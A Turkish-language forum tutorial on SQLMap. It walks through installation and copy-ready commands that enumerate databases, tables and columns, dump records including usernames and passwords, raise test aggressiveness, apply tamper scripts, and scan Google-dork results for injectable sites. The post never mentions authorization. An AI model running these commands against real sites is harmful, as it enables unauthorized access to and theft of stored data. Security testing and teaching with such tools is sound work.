You need to enable JavaScript to run this app.

Skip to main content

SQLMap Kullanımı - Web Uygulamalarında SQL Enjeksiyon Tehditlerini Keşfetme

SQLMap Kullanımı - Web Uygulamalarında SQL Enjeksiyon Tehditlerini Keşfetme

Junior Member
SQLMap Kullanımı - Web Uygulamalarında SQL Enjeksiyon Tehditlerini Keşfetme
Kurulum
  • İlk adım olarak, SQLMap'ı bilgisayarınıza indirin ve kurulumunu gerçekleştirin. SQLMap, Python tabanlı bir araç olduğu için Python yüklü olmalıdır.
  • Windows kullanıcıları için, SQLMap'in GitHub deposundan ZIP dosyasını indirip, dosyaları bir klasöre çıkartabilirsiniz. Linux kullanıcıları için, SQLMap genellikle dağıtım depolarında bulunur ve apt veya yum gibi paket yöneticileri aracılığıyla yüklenebilir.

Temel Kullanım

  • Terminal veya komut istemcisini açın ve SQLMap'i çalıştırın.
  • SQLMap'in ana kullanım biçimi, hedef URL'yi belirtmek ve ardından gerekli seçenekleri eklemektir.
     ÖRNEĞİN : sqlmap -u "http://example.com/login.php?id=1"
Tarama Seçenekleri
SQLMap, birçok tarama seçeneği sunar. --dbs seçeneği, tüm veritabanlarını listeler. --tables, --columns, --dump gibi diğer seçenekler, veritabanındaki tabloları ve sütunları incelemek için kullanılabilir.

Parametler ve Payloadlar
  • SQLMap, GET veya POST parametrelerine otomatik olarak SQL enjeksiyon payloads ekler. Bununla birlikte, bazı durumlarda manuel olarak parametreleri belirtmek gerekir.
  • Örneğin: --data veya --data-binary seçenekleri, POST verilerini belirtmek için kullanılır.

Şimdi bunları daha detaylı bir şekilde ve daha somut örneklerle anlatalım.

Hedef URL Belirleme
  • SQLMap'i kullanmadan önce hedef web uygulamasının URL'sini belirleyelim. 
Kod:
http://alisverismarketim.com/login.php?id=1
Tarama Seçenekleri
Kod:
# Tüm veritabanlarını listele
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --dbs

# Belirli bir veritabanındaki tabloları listele
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " -D dbname --tables

# Bir tablodaki sütunları listele
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " -D dbname -T tablename --columns

# Veritabanından veri çek
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " -D dbname -T tablename --dump
Diyelim ki username ve password kısmını çektik şimdi erişim iznine bakalım.

Kod:
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --data="username=test&password=test"
Son olarak ise daha gelişmiş tarama ve parametlere bakalım.

Kod:
# Enjeksiyon testlerinin agresifliğini belirler
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --level=5

# Enjeksiyon testlerinin risk seviyesini belirler
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --risk=3

# Çoklu iş parçacığı kullanarak taramayı hızlandırır
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --threads=10

# Tarama için bir HTTP proxy'si belirtir
sqlmap -u " http://alisverismarketim.com/login.php?id=1 " --proxy="http://127.0.0.1:8080"

# HTTP istekleri üzerinde otomatik olarak değişiklik yapmak için kullanılır
sqlmap -u "http://alisverismarketim.com/login.php?id=1" --tamper="space2comment.py"
Dork Tarama
Her şeyin yanı sıra yazdığınız dorku SQLMap üzerinden tarayabilirsiniz.

Kod:
sqlmap -g "index.php?=12" --dbs
Ve ben sadece maske ardında yaşayan bir adamım
Son Düzenleme: 02-16-2024, 16:24, Düzenleyen: LASİODORA.

İçerik sağlayıcı paylaşım sitesi olarak hizmet veren Siber Güvenlik Forumu sitemizde 5651 sayılı kanunun 8. maddesine ve T.C.K'nın 125. maddesine göre tüm üyelerimiz yaptıkları paylaşımlardan kendileri sorumludur. Sitemiz hakkında yapılacak tüm hukuksal şikayetleri İletişim bağlantısından bize ulaşıldıktan en geç 3 (üç) gün içerisinde ilgili kanunlar ve yönetmenlikler çerçevesinde tarafımızca incelenerek, gereken işlemler yapılacak ve site yöneticilerimiz tarafından bilgi verilecektir.